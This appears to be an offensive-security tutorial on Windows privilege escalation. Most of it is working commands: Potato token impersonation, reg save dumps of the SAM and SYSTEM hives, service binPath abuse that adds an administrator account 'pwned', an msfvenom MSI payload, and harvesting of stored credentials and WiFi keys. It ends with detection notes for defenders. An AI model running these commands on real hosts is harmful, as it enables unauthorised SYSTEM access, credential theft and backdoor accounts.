The Windows privilege escalation surface has narrowed since the days of unquoted-service-path goldmines, but it hasn’t disappeared. Token abuse, misconfigured services, and overlooked AutoLogon registry entries still net SYSTEM on a meaningful percentage of corporate hosts.

Step 0: Baseline

whoami /all
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname

whoami /all is the single most informative command. Look at:

  • Group membershipsBUILTIN\Administrators? Backup Operators? Remote Management Users?
  • PrivilegesSeImpersonatePrivilege, SeBackupPrivilege, SeDebugPrivilege, SeRestorePrivilege are all paths to SYSTEM.

Token Impersonation — The Service Account Killshot

Any user with SeImpersonatePrivilege (default for IIS app pools, MSSQL service accounts, many service identities) can pivot to SYSTEM with the Potato family.

# Modern: GodPotato (works on Server 2012+ through 2022)
GodPotato.exe -cmd "cmd /c whoami > C:\Users\Public\who.txt"
# → NT AUTHORITY\SYSTEM

Older equivalents — RottenPotato, JuicyPotato, RoguePotato, PrintSpoofer — each work on a narrower set of OS versions. GodPotato is the 2026 default.

SeBackupPrivilege

This privilege lets you read any file regardless of ACLs. The classic exploitation: copy SYSTEM and SAM hives offline, extract hashes, replay.

reg save HKLM\SYSTEM C:\Users\Public\system.hive /y
reg save HKLM\SAM    C:\Users\Public\sam.hive /y

Transfer to Kali → secretsdump.py -system system.hive -sam sam.hive LOCAL → local Administrator NT hash.

Unquoted Service Paths

Still alive on legacy installers:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows" | findstr /i /v """

If a service is configured as C:\Program Files\My Apps\Service Folder\service.exe (unquoted) and you can write to C:\Program Files\My Apps\, drop Service.exe there. On service restart, Windows tries each space-separated prefix and runs your payload as the service account.

Weak Service Permissions

# Service binary writable by your user
sc qc vulnsvc
icacls "C:\path\to\service.exe"
# → BUILTIN\Users:(M)  <-- you can modify

Or service configuration writable:

sc config vulnsvc binPath= "cmd /c net user pwned Pa55w0rd! /add && net localgroup administrators pwned /add"
sc start vulnsvc

AlwaysInstallElevated

Forgotten group policy that installs MSI files as SYSTEM regardless of caller. Check:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Both 0x1 → game over.

msfvenom -p windows/x64/exec CMD="net user atk Pa55w0rd! /add" -f msi > evil.msi
msiexec /quiet /qn /i evil.msi

Stored Credentials

# Credential Manager
cmdkey /list

# Saved RDP creds
dir /s *.rdp 2>nul

# AutoLogon (still depressingly common)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Unattend.xml from imaging
findstr /si "password" C:\Windows\Panther\Unattend*.xml C:\sysprep.inf 2>nul

# WiFi profiles
netsh wlan show profile
netsh wlan show profile name="CORP-WIFI" key=clear

Scheduled Tasks

schtasks /query /fo LIST /v

Look for tasks running as SYSTEM with executables you can overwrite. Or tasks with writable directories on PATH inside their command.

DLL Hijacking

A SYSTEM process loading a DLL by name searches a specific order. If you can drop a malicious DLL in a writable directory earlier in the search order, you execute as SYSTEM at the next process start.

Procmon (Sysinternals) reveals every DLL load with NAME NOT FOUND — those are hijack candidates.

UAC Bypass (User in Admin Group)

You’re an Admin user but running with medium integrity. Common bypasses still working in 2026:

  • fodhelper.exe registry hijack — UAC auto-elevation for ms-settings:
  • Sdclt.exe — UAC auto-elevation, Folder-key hijack
  • ICMLuaUtil COM elevation moniker — fileless

UACMe maintains the canonical, regularly updated list.

Automated Tools

# WinPEAS — most thorough
.\winPEASany.exe

# PowerUp — PowerShell, focused on services
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# SharpUp — C# port of PowerUp
.\SharpUp.exe audit

Detection Angles for Defenders

  • Service binary path modifications — Event ID 7045 on changes; baseline expected paths.
  • Token-impersonation precursors — RPC calls to NetSession, SchRpc — Sysmon Event ID 22/23.
  • Suspicious child processes from IIS / MSSQLw3wp.exe → cmd.exe is almost always bad.
  • MSI installs from user paths — Event ID 1024 in Application log.
  • Anomalous reg save HKLM\SAM — extremely high-fidelity signal.

References